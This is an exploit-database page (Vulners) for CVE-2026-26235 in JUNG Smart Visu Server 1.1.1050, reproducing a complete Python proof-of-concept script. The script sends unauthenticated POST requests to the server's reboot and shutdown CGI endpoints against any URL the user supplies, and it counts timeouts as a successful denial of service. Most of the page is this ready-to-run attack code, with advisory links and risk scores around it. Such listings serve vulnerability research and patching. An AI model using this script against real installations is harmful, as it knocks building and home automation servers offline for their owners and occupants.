Vulners
Lucene search
JUNG Smart Visu Server 1.1.1050 - Dos
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for CVE-2026-26235 | 12 Feb 202608:38 | – | githubexploit |
 | CVE-2026-26235 | 12 Feb 202602:31 | – | attackerkb |
 | CVE-2026-26235 | 12 Feb 202607:00 | – | circl |
 | JUNG Smart Visu Server 安全漏洞 | 12 Feb 202600:00 | – | cnnvd |
 | CVE-2026-26235 | 12 Feb 202602:31 | – | cve |
 | CVE-2026-26235 JUNG Smart Visu Server 1.1.1050 - 'JUNG Smart Visu Server' Missing Authentication | 12 Feb 202602:31 | – | cvelist |
 | CVE-2026-26235 | 12 Feb 202604:15 | – | nvd |
 | CVE-2026-26235 | 12 Feb 202604:15 | – | osv |
 | 📄 JUNG Smart Visu Server 1.1.1050 Denial of Service | 5 May 202600:00 | – | packetstorm |
 | PT-2026-7815 | 12 Feb 202600:00 | – | ptsecurity |
10
# Exploit Title: JUNG Smart Visu Server 1.1.1050- Dos
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)
import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def print_banner():
print("\n" + "="*60)
print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
print(" CVE-2026-26235 | CWE-306")
print("="*60 + "\n")
def exploit(target, action="reboot", verify_ssl=False, timeout=10):
endpoints = {
"reboot": "/cgi-bin/reboot.sh",
"shutdown": "/cgi-bin/shutdown.sh"
}
if action not in endpoints:
print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
return False
url = f"{target.rstrip('/')}{endpoints[action]}"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1",
"Cache-Control": "max-age=0",
"Origin": target.rstrip('/'),
"Referer": f"{target.rstrip('/')}/",
"DNT": "1",
"Sec-GPC": "1"
}
print(f"[*] Target : {url}")
print(f"[*] Action : {action.upper()}")
print(f"[*] SSL Verify : {verify_ssl}")
print("[*] Sending unauthenticated POST request...\n")
try:
response = requests.post(
url,
headers=headers,
data="",
verify=verify_ssl,
timeout=timeout,
allow_redirects=False
)
print(f"[+] Request sent successfully!")
print(f"[+] HTTP Status : {response.status_code}")
if response.status_code == 200:
print("[!] Server responded with 200 OK - action likely executed")
elif response.status_code == 302 or response.status_code == 301:
print("[!] Server responded with redirect - action may have been triggered")
else:
print(f"[?] Unexpected response code: {response.status_code}")
if response.text:
print(f"[*] Response preview: {response.text[:200].strip()}")
print("\n[!] If successful, the target server should now be restarting or shutting down.")
return True
except requests.exceptions.Timeout:
print("[-] Connection timeout. The server may be down or unreachable.")
print("[*] This could indicate successful DoS if the server was previously reachable.")
return True
except requests.exceptions.ConnectionError as e:
print(f"[-] Connection error: {e}")
print("[*] The server may have gone down - possibly successful exploitation.")
return True
except Exception as e:
print(f"[-] An error occurred: {e}")
return False
def main():
print_banner()
parser = argparse.ArgumentParser(
description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
)
parser.add_argument(
"target",
help="Target server URL (e.g., https://192.168.1.100:8080)"
)
parser.add_argument(
"-a", "--action",
choices=["reboot", "shutdown"],
default="reboot",
help="Action to perform: reboot or shutdown (default: reboot)"
)
parser.add_argument(
"-k", "--insecure",
action="store_false",
dest="verify_ssl",
default=False,
help="Disable SSL certificate verification (default: disabled)"
)
parser.add_argument(
"-t", "--timeout",
type=int,
default=10,
help="Request timeout in seconds (default: 10)"
)
args = parser.parse_args()
print(f"[*] Starting exploit against: {args.target}\n")
success = exploit(
target=args.target,
action=args.action,
verify_ssl=args.verify_ssl,
timeout=args.timeout
)
if success:
print("\n[+] Exploit completed successfully.")
else:
print("\n[-] Exploit failed.")
sys.exit(1)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Apr 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.5
CVSS 48.7
EPSS0.04372
SSVC